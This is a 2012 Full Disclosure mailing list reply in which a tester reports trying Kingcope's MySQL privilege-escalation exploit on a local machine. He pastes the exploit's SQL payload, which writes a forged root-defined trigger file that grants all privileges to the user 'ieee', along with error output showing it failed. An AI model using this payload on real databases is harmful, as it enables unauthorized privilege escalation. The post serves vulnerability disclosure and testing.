Full Disclosure mailing list archives
Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit
From: Eren Yağdıran <erenyagdiran () gmail com>
Date: Mon, 3 Dec 2012 15:01:38 -0500
Hello guys,

I tried this zero-day exploit on my local machine:

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Database client version: libmysql - 5.0.51a

My exploit output is:

select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/ieee/rootme.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\', max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE User=\\\'ieee\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';
DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost' (using password: YES) at org.pl line 31.
DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost' (using password: YES) at org.pl line 32.
DBD::mysql::db do failed: Lost connection to MySQL server during query at org.pl line 35.
DBD::mysql::db do failed: Lost connection to MySQL server during query at org.pl line 44.
DBD::mysql::db do failed: Access denied; you need the CREATE USER privilege for this operation at org.pl line 52.
DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost' (using password: YES) at org.pl line 53.
DBD::mysql::db do failed: Lost connection to MySQL server during query at org.pl line 54.
DBI connect('host=localhost;','rootedbox2',...) failed: Access denied for user 'rootedbox2'@'localhost' (using password: YES) at org.pl line 58
Can't call method "prepare" on an undefined value at org.pl line 62.

I think it's not working.

On Sat, Dec 1, 2012 at 4:26 PM, king cope <isowarez.isowarez.isowarez () googlemail com> wrote:
(see attachment)

Cheerio,
Kingcope
--
- Eren Yağdıran
http://www.about.me/eren

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/